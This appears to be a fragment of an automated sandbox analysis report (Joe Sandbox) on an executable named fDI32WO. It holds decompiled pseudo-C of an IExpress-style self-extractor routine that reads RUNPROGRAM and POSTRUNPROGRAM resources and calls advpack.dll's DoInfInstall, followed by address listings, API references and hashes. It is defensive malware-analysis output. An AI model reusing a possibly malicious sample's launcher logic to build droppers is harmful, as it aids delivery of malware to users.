                                                                                                                                                                                                                                              												_t146 =  &_v352;
                                                                                                                                                                                                                                              												_t130 = _t151; // executed
                                                                                                                                                                                                                                              												_t79 = E00A83FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                              												__eflags = _t79;
                                                                                                                                                                                                                                              												if(_t79 == 0) {
                                                                                                                                                                                                                                              													L61:
                                                                                                                                                                                                                                              													LocalFree(_t151);
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                                                              												LocalFree(_t151);
                                                                                                                                                                                                                                              												_t127 = _t127 + 1;
                                                                                                                                                                                                                                              												_v396 = _t127;
                                                                                                                                                                                                                                              												__eflags = _t127 - 2;
                                                                                                                                                                                                                                              												if(_t127 >= 2) {
                                                                                                                                                                                                                                              													_t155 = 1;
                                                                                                                                                                                                                                              													__eflags = 1;
                                                                                                                                                                                                                                              													L69:
                                                                                                                                                                                                                                              													__eflags =  *0xa88580;
                                                                                                                                                                                                                                              													if( *0xa88580 != 0) {
                                                                                                                                                                                                                                              														E00A82267();
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													_t77 = _t155;
                                                                                                                                                                                                                                              													goto L63;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t153 = _v392;
                                                                                                                                                                                                                                              												_t149 = _v388;
                                                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											L38:
                                                                                                                                                                                                                                              											__eflags =  *0xa88180;
                                                                                                                                                                                                                                              											if( *0xa88180 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c7;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              												LocalFree(_v424);
                                                                                                                                                                                                                                              												 *0xa89124 = 0x8007042b;
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0xa89a34 & 0x00000004;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												goto L57;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t129 = E00A86495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                              											__eflags = _t129;
                                                                                                                                                                                                                                              											if(_t129 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c8;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                              												L65:
                                                                                                                                                                                                                                              												LocalFree(_v408);
                                                                                                                                                                                                                                              												 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              												goto L62;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                              											_v404 = _t146;
                                                                                                                                                                                                                                              											__eflags = _t146;
                                                                                                                                                                                                                                              											if(_t146 == 0) {
                                                                                                                                                                                                                                              												_t146 = 0x4c9;
                                                                                                                                                                                                                                              												__eflags = 0;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                              												FreeLibrary(_t129);
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0xa88a30;
                                                                                                                                                                                                                                              											_t151 = _v408;
                                                                                                                                                                                                                                              											_v384 = 0;
                                                                                                                                                                                                                                              											_v368 =  &_v280;
                                                                                                                                                                                                                                              											_t96 =  *0xa89a40; // 0x3
                                                                                                                                                                                                                                              											_v364 = _t96;
                                                                                                                                                                                                                                              											_t97 =  *0xa88a38 & 0x0000ffff;
                                                                                                                                                                                                                                              											_v380 = 0xa89154;
                                                                                                                                                                                                                                              											_v376 = _t151;
                                                                                                                                                                                                                                              											_v372 = 0xa891e4;
                                                                                                                                                                                                                                              											_v360 = _t97;
                                                                                                                                                                                                                                              											if( *0xa88a30 != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t144 =  *0xa89a34; // 0x1
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                              											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t145 =  *0xa88d48; // 0x0
                                                                                                                                                                                                                                              											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                              											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                              												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                                                                                              												_v360 = _t97;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t145;
                                                                                                                                                                                                                                              											if(_t145 < 0) {
                                                                                                                                                                                                                                              												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                              												__eflags = _t104;
                                                                                                                                                                                                                                              												_v360 = _t104;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t98 =  *0xa89a38; // 0x0
                                                                                                                                                                                                                                              											_v356 = _t98;
                                                                                                                                                                                                                                              											_t130 = _t146;
                                                                                                                                                                                                                                              											 *0xa8a288( &_v384);
                                                                                                                                                                                                                                              											_t101 = _v404();
                                                                                                                                                                                                                                              											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                              											if(_t164 != _t164) {
                                                                                                                                                                                                                                              												_t130 = 4;
                                                                                                                                                                                                                                              												asm("int 0x29");
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											 *0xa89124 = _t101;
                                                                                                                                                                                                                                              											_push(_t129);
                                                                                                                                                                                                                                              											__eflags = _t101;
                                                                                                                                                                                                                                              											if(_t101 < 0) {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												goto L61;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												FreeLibrary();
                                                                                                                                                                                                                                              												_t127 = _v400;
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0xa89a40 - 1; // 0x3
                                                                                                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags =  *0xa88a20;
                                                                                                                                                                                                                                              										if( *0xa88a20 == 0) {
                                                                                                                                                                                                                                              											goto L37;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t157;
                                                                                                                                                                                                                                              										if(_t157 != 0) {
                                                                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              										E00A8202A(_t146); // executed
                                                                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v280;
                                                                                                                                                                                                                                              									_t108 = E00A8468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                              									__eflags = _t108;
                                                                                                                                                                                                                                              									if(_t108 == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0xa88c42;
                                                                                                                                                                                                                                              									if( *0xa88c42 != 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                              									__eflags = _t112 == 0;
                                                                                                                                                                                                                                              									if(_t112 == 0) {
                                                                                                                                                                                                                                              										goto L69;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t118 =  *0xa88a38; // 0x0
                                                                                                                                                                                                                                              								if(_t118 == 0) {
                                                                                                                                                                                                                                              									L23:
                                                                                                                                                                                                                                              									if(_t153 != 0) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E00A8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                              										goto L27;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L25;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                              									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              										goto L62;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "USRQCMD";
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									_t146 =  &_v276;
                                                                                                                                                                                                                                              									if(E00A8468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                              										goto L25;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                              										_t153 = 1;
                                                                                                                                                                                                                                              										_v388 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L26:
                                                                                                                                                                                                                                              						_push(_t130);
                                                                                                                                                                                                                                              						_t146 = 0x104;
                                                                                                                                                                                                                                              						E00A81781( &_v276, 0x104, _t130, 0xa88c42);
                                                                                                                                                                                                                                              						goto L27;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t130 = "REBOOT";
                                                                                                                                                                                                                                              				_t125 = E00A8468F(_t130, 0xa89a2c, 4);
                                                                                                                                                                                                                                              				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                              					goto L25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





























































                                                                                                                                                                                                                                              0x00a83baa
                                                                                                                                                                                                                                              0x00a83bb0
                                                                                                                                                                                                                                              0x00a83bb7
                                                                                                                                                                                                                                              0x00a83bc0
                                                                                                                                                                                                                                              0x00a83bc2
                                                                                                                                                                                                                                              0x00a83bc9
                                                                                                                                                                                                                                              0x00a83bcb
                                                                                                                                                                                                                                              0x00a83bcf
                                                                                                                                                                                                                                              0x00a83bd3
                                                                                                                                                                                                                                              0x00a83bd9
                                                                                                                                                                                                                                              0x00a83bfd
                                                                                                                                                                                                                                              0x00a83bfd
                                                                                                                                                                                                                                              0x00a83bff
                                                                                                                                                                                                                                              0x00a83c03
                                                                                                                                                                                                                                              0x00a83c03
                                                                                                                                                                                                                                              0x00a83c11
                                                                                                                                                                                                                                              0x00a83c16
                                                                                                                                                                                                                                              0x00a83c19
                                                                                                                                                                                                                                              0x00a83c28
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c30
                                                                                                                                                                                                                                              0x00a83c39
                                                                                                                                                                                                                                              0x00a83c40
                                                                                                                                                                                                                                              0x00a83d13
                                                                                                                                                                                                                                              0x00a83d15
                                                                                                                                                                                                                                              0x00a83d21
                                                                                                                                                                                                                                              0x00a83d26
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c4f
                                                                                                                                                                                                                                              0x00a83c56
                                                                                                                                                                                                                                              0x00a83c60
                                                                                                                                                                                                                                              0x00a83c65
                                                                                                                                                                                                                                              0x00a83c77
                                                                                                                                                                                                                                              0x00a83c78
                                                                                                                                                                                                                                              0x00a83c7c
                                                                                                                                                                                                                                              0x00a83c7e
                                                                                                                                                                                                                                              0x00a83c82
                                                                                                                                                                                                                                              0x00a83c82
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c7c
                                                                                                                                                                                                                                              0x00a83c67
                                                                                                                                                                                                                                              0x00a83c69
                                                                                                                                                                                                                                              0x00a83c6d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c58
                                                                                                                                                                                                                                              0x00a83c58
                                                                                                                                                                                                                                              0x00a83c6e
                                                                                                                                                                                                                                              0x00a83c6e
                                                                                                                                                                                                                                              0x00a83c87
                                                                                                                                                                                                                                              0x00a83c89
                                                                                                                                                                                                                                              0x00a83d4d
                                                                                                                                                                                                                                              0x00a83d4f
                                                                                                                                                                                                                                              0x00a83d50
                                                                                                                                                                                                                                              0x00a83d52
                                                                                                                                                                                                                                              0x00a83d9e
                                                                                                                                                                                                                                              0x00a83da8
                                                                                                                                                                                                                                              0x00a83daf
                                                                                                                                                                                                                                              0x00a83db4
                                                                                                                                                                                                                                              0x00a83db6
                                                                                                                                                                                                                                              0x00a83f4d
                                                                                                                                                                                                                                              0x00a83f4d
                                                                                                                                                                                                                                              0x00a83f4f
                                                                                                                                                                                                                                              0x00a83f56
                                                                                                                                                                                                                                              0x00a83f57
                                                                                                                                                                                                                                              0x00a83f58
                                                                                                                                                                                                                                              0x00a83f63
                                                                                                                                                                                                                                              0x00a83f63
                                                                                                                                                                                                                                              0x00a83dbc
                                                                                                                                                                                                                                              0x00a83dc0
                                                                                                                                                                                                                                              0x00a83dc2
                                                                                                                                                                                                                                              0x00a83de6
                                                                                                                                                                                                                                              0x00a83de6
                                                                                                                                                                                                                                              0x00a83de8
                                                                                                                                                                                                                                              0x00a83f0b
                                                                                                                                                                                                                                              0x00a83f0b
                                                                                                                                                                                                                                              0x00a83f0f
                                                                                                                                                                                                                                              0x00a83f13
                                                                                                                                                                                                                                              0x00a83f15
                                                                                                                                                                                                                                              0x00a83f1a
                                                                                                                                                                                                                                              0x00a83f1c
                                                                                                                                                                                                                                              0x00a83f46
                                                                                                                                                                                                                                              0x00a83f47
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83f47
                                                                                                                                                                                                                                              0x00a83f1e
                                                                                                                                                                                                                                              0x00a83f1f
                                                                                                                                                                                                                                              0x00a83f25
                                                                                                                                                                                                                                              0x00a83f26
                                                                                                                                                                                                                                              0x00a83f2a
                                                                                                                                                                                                                                              0x00a83f2d
                                                                                                                                                                                                                                              0x00a83fd9
                                                                                                                                                                                                                                              0x00a83fd9
                                                                                                                                                                                                                                              0x00a83fda
                                                                                                                                                                                                                                              0x00a83fda
                                                                                                                                                                                                                                              0x00a83fe1
                                                                                                                                                                                                                                              0x00a83fe3
                                                                                                                                                                                                                                              0x00a83fe3
                                                                                                                                                                                                                                              0x00a83fe8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83fe8
                                                                                                                                                                                                                                              0x00a83f33
                                                                                                                                                                                                                                              0x00a83f37
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83f37
                                                                                                                                                                                                                                              0x00a83dee
                                                                                                                                                                                                                                              0x00a83dee
                                                                                                                                                                                                                                              0x00a83df5
                                                                                                                                                                                                                                              0x00a83fad
                                                                                                                                                                                                                                              0x00a83fb9
                                                                                                                                                                                                                                              0x00a83fc2
                                                                                                                                                                                                                                              0x00a83fc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83fc8
                                                                                                                                                                                                                                              0x00a83dfb
                                                                                                                                                                                                                                              0x00a83dfd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83e03
                                                                                                                                                                                                                                              0x00a83e0a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83e15
                                                                                                                                                                                                                                              0x00a83e17
                                                                                                                                                                                                                                              0x00a83e19
                                                                                                                                                                                                                                              0x00a83f94
                                                                                                                                                                                                                                              0x00a83fa4
                                                                                                                                                                                                                                              0x00a83f7c
                                                                                                                                                                                                                                              0x00a83f80
                                                                                                                                                                                                                                              0x00a83f8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83f8b
                                                                                                                                                                                                                                              0x00a83e2c
                                                                                                                                                                                                                                              0x00a83e30
                                                                                                                                                                                                                                              0x00a83e34
                                                                                                                                                                                                                                              0x00a83e36
                                                                                                                                                                                                                                              0x00a83f69
                                                                                                                                                                                                                                              0x00a83f6e
                                                                                                                                                                                                                                              0x00a83f70
                                                                                                                                                                                                                                              0x00a83f76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83f76
                                                                                                                                                                                                                                              0x00a83e3c
                                                                                                                                                                                                                                              0x00a83e43
                                                                                                                                                                                                                                              0x00a83e47
                                                                                                                                                                                                                                              0x00a83e52
                                                                                                                                                                                                                                              0x00a83e56
                                                                                                                                                                                                                                              0x00a83e5c
                                                                                                                                                                                                                                              0x00a83e61
                                                                                                                                                                                                                                              0x00a83e68
                                                                                                                                                                                                                                              0x00a83e70
                                                                                                                                                                                                                                              0x00a83e74
                                                                                                                                                                                                                                              0x00a83e7c
                                                                                                                                                                                                                                              0x00a83e80
                                                                                                                                                                                                                                              0x00a83e82
                                                                                                                                                                                                                                              0x00a83e82
                                                                                                                                                                                                                                              0x00a83e87
                                                                                                                                                                                                                                              0x00a83e87
                                                                                                                                                                                                                                              0x00a83e8b
                                                                                                                                                                                                                                              0x00a83e91
                                                                                                                                                                                                                                              0x00a83e94
                                                                                                                                                                                                                                              0x00a83e96
                                                                                                                                                                                                                                              0x00a83e96
                                                                                                                                                                                                                                              0x00a83e9b
                                                                                                                                                                                                                                              0x00a83e9b
                                                                                                                                                                                                                                              0x00a83e9f
                                                                                                                                                                                                                                              0x00a83ea2
                                                                                                                                                                                                                                              0x00a83ea4
                                                                                                                                                                                                                                              0x00a83ea4
                                                                                                                                                                                                                                              0x00a83ea9
                                                                                                                                                                                                                                              0x00a83ea9
                                                                                                                                                                                                                                              0x00a83ead
                                                                                                                                                                                                                                              0x00a83eb3
                                                                                                                                                                                                                                              0x00a83eb6
                                                                                                                                                                                                                                              0x00a83eb8
                                                                                                                                                                                                                                              0x00a83eb8
                                                                                                                                                                                                                                              0x00a83ebd
                                                                                                                                                                                                                                              0x00a83ebd
                                                                                                                                                                                                                                              0x00a83ec1
                                                                                                                                                                                                                                              0x00a83ec3
                                                                                                                                                                                                                                              0x00a83ec5
                                                                                                                                                                                                                                              0x00a83ec5
                                                                                                                                                                                                                                              0x00a83eca
                                                                                                                                                                                                                                              0x00a83eca
                                                                                                                                                                                                                                              0x00a83ece
                                                                                                                                                                                                                                              0x00a83ed5
                                                                                                                                                                                                                                              0x00a83ed9
                                                                                                                                                                                                                                              0x00a83ee0
                                                                                                                                                                                                                                              0x00a83ee6
                                                                                                                                                                                                                                              0x00a83eea
                                                                                                                                                                                                                                              0x00a83eec
                                                                                                                                                                                                                                              0x00a83eee
                                                                                                                                                                                                                                              0x00a83ef3
                                                                                                                                                                                                                                              0x00a83ef3
                                                                                                                                                                                                                                              0x00a83ef5
                                                                                                                                                                                                                                              0x00a83efa
                                                                                                                                                                                                                                              0x00a83efb
                                                                                                                                                                                                                                              0x00a83efd
                                                                                                                                                                                                                                              0x00a83f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83eff
                                                                                                                                                                                                                                              0x00a83eff
                                                                                                                                                                                                                                              0x00a83f05
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83f05
                                                                                                                                                                                                                                              0x00a83efd
                                                                                                                                                                                                                                              0x00a83dc7
                                                                                                                                                                                                                                              0x00a83dce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83dd0
                                                                                                                                                                                                                                              0x00a83dd7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83dd9
                                                                                                                                                                                                                                              0x00a83ddb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83ddd
                                                                                                                                                                                                                                              0x00a83de1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83de1
                                                                                                                                                                                                                                              0x00a83d59
                                                                                                                                                                                                                                              0x00a83d65
                                                                                                                                                                                                                                              0x00a83d6a
                                                                                                                                                                                                                                              0x00a83d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83d6e
                                                                                                                                                                                                                                              0x00a83d75
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83d8f
                                                                                                                                                                                                                                              0x00a83d96
                                                                                                                                                                                                                                              0x00a83d98
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83d98
                                                                                                                                                                                                                                              0x00a83c8f
                                                                                                                                                                                                                                              0x00a83c98
                                                                                                                                                                                                                                              0x00a83cf1
                                                                                                                                                                                                                                              0x00a83cf3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83cfe
                                                                                                                                                                                                                                              0x00a83d11
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83d11
                                                                                                                                                                                                                                              0x00a83c9c
                                                                                                                                                                                                                                              0x00a83ca5
                                                                                                                                                                                                                                              0x00a83ca7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83cad
                                                                                                                                                                                                                                              0x00a83cb2
                                                                                                                                                                                                                                              0x00a83cb7
                                                                                                                                                                                                                                              0x00a83cc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83ce8
                                                                                                                                                                                                                                              0x00a83cec
                                                                                                                                                                                                                                              0x00a83ced
                                                                                                                                                                                                                                              0x00a83ced
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83ce8
                                                                                                                                                                                                                                              0x00a83c9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83c9e
                                                                                                                                                                                                                                              0x00a83c56
                                                                                                                                                                                                                                              0x00a83d35
                                                                                                                                                                                                                                              0x00a83d35
                                                                                                                                                                                                                                              0x00a83d3c
                                                                                                                                                                                                                                              0x00a83d48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83d48
                                                                                                                                                                                                                                              0x00a83c03
                                                                                                                                                                                                                                              0x00a83be2
                                                                                                                                                                                                                                              0x00a83be7
                                                                                                                                                                                                                                              0x00a83bee
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A83C11
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A83CDC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A88C42), ref: 00A83D8F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A83E26
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00A88C42), ref: 00A83EFF
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00A88C42), ref: 00A83F1F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00A88C42), ref: 00A83F40
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00A88C42), ref: 00A83F47
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A88C42), ref: 00A83F76
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A88C42), ref: 00A83F80
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A88C42), ref: 00A83FC2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                              • API String ID: 1032054927-2479693719
                                                                                                                                                                                                                                              • Opcode ID: 71ce46b826c7d3cc184d3b10b7576c5be166ce8734824694d8e72cf55659f732
                                                                                                                                                                                                                                              • Instruction ID: b708288497d129a437b2bfa4da9f7f225a6af87f6091c046bcb019526f007775
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71ce46b826c7d3cc184d3b10b7576c5be166ce8734824694d8e72cf55659f732
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54B1D5729083019FDB24FF648945B6BB6F4FB84B40F14492EFA85D6190EB74CD46CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
